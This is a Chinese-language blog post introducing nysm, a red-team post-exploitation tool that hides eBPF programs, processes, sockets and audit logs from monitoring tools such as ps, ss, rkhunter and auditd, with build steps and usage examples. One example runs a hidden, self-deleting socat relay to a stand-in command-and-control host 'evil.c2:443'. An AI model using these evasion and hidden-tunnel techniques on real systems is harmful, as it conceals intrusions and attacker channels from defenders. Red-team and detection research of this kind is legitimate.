nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

2024-03-26 1,049 0

关于nysm

nysm是一款针对红队审计的隐蔽型后渗透安全测试容器,该工具主要针对的是eBPF,能够帮助广大红队研究人员在后渗透测试场景下保持eBPF的隐蔽性。

功能特性

随着基于eBPF的安全工具越来越受社区欢迎,nysm也应运而生。该工具能保持各种安全测试工具的隐蔽性,当前版本的nysm支持隐藏下列内容:

1、新的eBPF程序;

2、新的eBPF Map;

3、新的eBPF链接;

4、新的审计生成日志;

5、新的进程PID;

6、新的会话套接字;

除了隐藏eBPF之外,当前版本的nysm还支持隐藏下列工具组件:

bpftool

bpflist-bpfcc

ps

top

sockstat

ss

rkhunter

chkrootkit

lsof

auditd

...

工具安装

源码获取:

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/eeriedusk/nysm.git

工具依赖组件安装:

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux Header配置:

cd ./nysm/src/

bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

代码构建:

cd ./nysm/src/

make

工具使用

nysm的使用非常简单,并提供了下列参数命令:

Usage: nysm [OPTION...] COMMAND

Stealth eBPF container.

 

  -d, --detach               在后台运行命令

  -r, --rm                   执行后执行自毁程序

  -v, --verbose              生成Verbose模式输出

  -h, --help                  显示工具帮助信息

      --usage                显示工具使用提示消息

工具使用样例

运行一个隐藏的Bash:

./nysm bash

运行一个隐藏的ssh并移除./nysm:

./nysm -r ssh user@domain

以守护进程形式运行一个隐藏的socat并移除./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

许可证协议

本项目的开发与发布遵循Apache-2.0开源许可证协议。

项目地址

nysm:【GitHub传送门


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论